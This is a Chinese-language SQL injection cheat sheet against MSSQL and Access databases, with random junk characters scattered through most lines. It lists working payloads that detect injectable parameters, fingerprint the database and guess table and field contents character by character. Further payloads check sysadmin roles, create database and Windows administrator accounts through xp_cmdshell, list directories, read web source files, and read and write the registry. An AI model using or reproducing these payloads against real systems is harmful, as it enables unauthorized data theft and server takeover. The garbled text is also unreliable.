1.判断是否有注入;and 1=1 ;and 1=2 *if`/N-q(m
2.初步判断是否是mssql ;and user>0 {ci.V*:"
2g-` ]Vqb
3.注入参数是字符'and [查询条件] and ''=' + ulagE|7
!*{q^IO9v&
4.搜索时没过滤参数的'and [查询条件] and '%25'=' =(o']ZaaA
}m-"8\_D
5.判断数据库系统 IG ~`i I
nZk+
;and (select count(*) from sysobjects)>0 mssql 4aUiXyr*2
`]i
[]|
;and (select count(*) from msysobjects)>0 access %*}Y6tl '|
"ju'UOcS/
L] %l51U
kmPYx)o
6.猜数据库 ;and (select Count(*) from [数据库名])>0 uLR<FpM
vB'>[jvA|
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 6 %Mt
pG3k
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Cu;5RSr2Z
v,@F|c?_S
9.(1)猜字段的ascii值(access) ";SiL{Z
]?+{aS-]?k
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 jgv`>o%<W
;C.S3}
(2)猜字段的ascii值(mssql) i^msjA
M@et6aud;K
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 L%"LlSg
C[sh,
10.测试权限结构(mssql) Vvp[P>
iUi>y.}"P
Kn`M4O
tq1CwzRX
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- I:98 $ r$
64>krmVIe
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- (V:E2WR
V!_71x\-Q
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- KqY["5p
R%Y`=pK>}
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- GLMm(
.B2]xfo"`
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ^x>Qf(b
Z @ dC+0[=
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- :aCrX
hVUh0XeO
;and 1=(select IS_MEMBER('db_owner'));-- ,f3pqi9|
w
obgu
MK#wut
V~G`kkNy
11.添加mssql和系统的帐户 ED>prE0
tJViA`@x
;exec master.dbo.sp_addlogin username;-- n{*D_kM(H
;exec master.dbo.sp_password null,username,password;-- "*1f;+\
fxaJZz$o
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Z<[<n0o1
\JEXX4%
;exec master.dbo.xp_cmdshell 'net user username password m,i,n9C->
G2bDf-1ew
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- x!LQxoNF
aT!'}GjL
;exec master.dbo.xp_cmdshell 'net user username password /add';-- nfSbM3D]h
nn/?fIZN4
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- GPz(j'jU
H %JaZ?(
K.<.cJE
i9<pqQ
12.(1)遍历目录 ygJr=_iA9
JxE53ev
;create table dirs(paths varchar(100), id int) i':ydDOOHA
fWfk[(M'9
;insert dirs exec master.dbo.xp_dirtree 'c:\' XR2~Q)@
TxjYrzC
;and (select top 1 paths from dirs)>0 nRL. ppUI
6tHO!`}1
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) M5nWVK7c
B~]5$-
Qd}m`YW-f$
7w,FX.=;cv
(2)遍历目录 DI+]D~N
d@`M
CchCB
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- voP7"Dl[
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 wN1niR'
|8>3`w!
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 dI&!e#Y
j`^$#
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 $vC1 K5sLk
QO;N9ZI
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 zJP6F.Ov!
X[`bMa7IB(
b2aF 'y/
\$0F-=w`8
13.mssql中的存储过程 `>0MNmu
L
pR''`2BT
xp_regenumvalues 注册表根键, 子键 p&+;w
Bjk]ZU0T
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 f Vb-$
\drqG&wl
xp_regread 根键,子键,键值名 (py]LBZ
@1*ohdHH
;exec xp_regread +fvaUV_-
Bm&kkx.9P
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ~|<WHHN(
\fA{1
xp_regwrite 根键,子键, 值名, 值类型, 值 Eskb9^A
7VcmVq}X
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 =mA: ctu~v
S*j6OwZ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 IDnC<